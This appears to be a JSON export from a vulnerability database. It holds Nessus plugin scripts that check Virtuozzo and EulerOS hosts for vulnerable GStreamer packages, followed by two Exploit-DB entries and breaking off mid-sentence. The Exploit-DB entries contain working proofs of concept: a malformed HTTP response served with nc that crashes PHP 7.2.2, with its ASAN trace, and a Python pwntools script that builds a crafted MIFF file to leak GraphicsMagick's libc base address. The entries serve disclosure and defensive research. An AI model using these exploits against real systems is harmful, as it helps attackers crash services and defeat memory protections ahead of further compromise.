H.264 and MPEG-TS\nplug-ins. A remote attacker could use these flaws to cause an\napplication using GStreamer to crash. (CVE-2016-9809, CVE-2016-9812,\nCVE-2016-9813)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0021.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ef94c266\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0021\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gstreamer1-plugins-bad-free / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:gstreamer1-plugins-bad-free\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:gstreamer1-plugins-bad-free-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"gstreamer1-plugins-bad-free-1.4.5-6.vl7\",\n \"gstreamer1-plugins-bad-free-devel-1.4.5-6.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer1-plugins-bad-free / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:03:45", "bulletinFamily": "scanner", "description": "According to the versions of the gstreamer1-plugins-bad-free package\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in GStreamer", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2017-1007.NASL", "href": "https://www.tenable.com/plugins/nessus/99853", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP2 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1007)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99853);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-9445\",\n \"CVE-2016-9809\",\n \"CVE-2016-9812\",\n \"CVE-2016-9813\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1007)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the gstreamer1-plugins-bad-free package\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in GStreamer's VMware VMnc\n video file format decoding plug-in. A remote attacker\n could use this flaw to cause an application using\n GStreamer to crash or, potentially, execute arbitrary\n code with the privileges of the user running the\n application. (CVE-2016-9445)\n\n - Multiple flaws were discovered in GStreamer's H.264 and\n MPEG-TS plug-ins. A remote attacker could use these\n flaws to cause an application using GStreamer to crash.\n (CVE-2016-9809, CVE-2016-9812, CVE-2016-9813)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1007\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51ff6a7f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gstreamer1-plugins-bad-free packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:gstreamer1-plugins-bad-free\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"gstreamer1-plugins-bad-free-1.4.5-6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \" gstreamer1-plugins-bad-free\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:03:45", "bulletinFamily": "scanner", "description": "According to the versions of the gstreamer1-plugins-bad-free package\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in GStreamer", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2017-1008.NASL", "href": "https://www.tenable.com/plugins/nessus/99854", "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1008)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99854);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/14 14:36:22\");\n\n script_cve_id(\n \"CVE-2016-9445\",\n \"CVE-2016-9809\",\n \"CVE-2016-9812\",\n \"CVE-2016-9813\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : gstreamer1-plugins-bad-free (EulerOS-SA-2017-1008)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the gstreamer1-plugins-bad-free package\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - An integer overflow flaw, leading to a heap-based\n buffer overflow, was found in GStreamer's VMware VMnc\n video file format decoding plug-in. A remote attacker\n could use this flaw to cause an application using\n GStreamer to crash or, potentially, execute arbitrary\n code with the privileges of the user running the\n application. (CVE-2016-9445)\n\n - Multiple flaws were discovered in GStreamer's H.264 and\n MPEG-TS plug-ins. A remote attacker could use these\n flaws to cause an application using GStreamer to crash.\n (CVE-2016-9809, CVE-2016-9812, CVE-2016-9813)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74dd7c95\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected gstreamer1-plugins-bad-free packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:gstreamer1-plugins-bad-free\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"gstreamer1-plugins-bad-free-1.4.5-6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer1-plugins-bad-free\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2018-06-06T12:20:24", "bulletinFamily": "exploit", "description": "PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow. CVE-2018-7584. Dos exploit for PHP platform", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "EDB-ID:44846", "href": "https://www.exploit-db.com/exploits/44846/", "type": "exploitdb", "title": "PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow", "sourceData": "Description:\r\n------------\r\nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:\r\n\r\nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n\r\n\t\t\tif (tmp_line[tmp_line_len - 1] == '\\n') {\r\n\t\t\t\t--tmp_line_len;\r\n\t\t\t\tif (tmp_line[tmp_line_len - 1] == '\\r') {\r\n\t\t\t\t\t--tmp_line_len;\r\n\t\t\t\t}\r\n}\r\n\r\nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.\r\n\r\n$ bin/php --version\r\nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )\r\nCopyright (c) 1997-2018 The PHP Group\r\nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies\r\n\r\n\r\nTest script:\r\n---------------\r\n$ xxd -g 1 poc\r\n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..\r\n\r\n$ nc -vvlp 8080 < poc\r\nListening on [0.0.0.0] (family 0, port 8080)\r\nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)\r\nGET / HTTP/1.0\r\nHost: localhost:8080\r\nConnection: close\r\n\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n\r\nExpected result:\r\n----------------\r\nNO CRASH\r\n\r\nActual result:\r\n--------------\r\n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");'\r\n=================================================================\r\n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac\r\nREAD of size 1 at 0xbfc038ef thread T0\r\n #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723\r\n #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979\r\n #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027\r\n #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550\r\n #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224\r\n #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573\r\n #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731\r\n #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760\r\n #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082\r\n #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123\r\n #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134\r\n #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042\r\n #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404\r\n #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)\r\n #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)\r\nAddress 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:\r\n This frame has 13 object(s):\r\n [32, 36) 'transport_string'\r\n [96, 100) 'errstr'\r\n [160, 164) 'http_header_line_length'\r\n [224, 232) 'timeout'\r\n [288, 296) 'req_buf'\r\n [352, 360) 'tmpstr'\r\n [416, 432) 'ssl_proxy_peer_name'\r\n [480, 496) 'http_header'\r\n [544, 576) 'buf'\r\n [608, 736) 'tmp_line'\r\n [768, 1792) 'location'\r\n [1824, 2848) 'new_path'\r\n [2880, 3904) 'loc_path'\r\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext\r\n (longjmp and C++ exceptions *are* supported)\r\nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex\r\nShadow bytes around the buggy address:\r\n 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4\r\n 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4\r\n 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00\r\n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00\r\n 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2\r\n 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap righ redzone: fb\r\n Freed Heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==26249== ABORTING\r\nAborted", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44846/"}, {"lastseen": "2017-11-03T20:31:35", "bulletinFamily": "exploit", "description": "GraphicsMagick - Memory Disclosure / Heap Overflow. CVE-2017-16352,CVE-2017-16353. Dos exploit for Multiple platform", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "id": "EDB-ID:43111", "href": "https://www.exploit-db.com/exploits/43111/", "type": "exploitdb", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n\r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n\r\nThe vulnerabilities found are:\r\n\r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n\r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n\r\n\r\nVulnerabilities details\r\n\r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n\r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n\r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n\r\nThe code which triggers the vulnerable code path is:\r\n\r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n\r\n\r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n\r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n\r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n\r\n\r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n\r\n\r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n\r\n\r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n\r\n\r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n\r\n\r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n\r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n\r\nProof of Concept\r\n\r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n\r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n\r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n\r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n\r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n\r\n\r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n\r\nOne possible way to trigger the vulnerability is to run the identify command 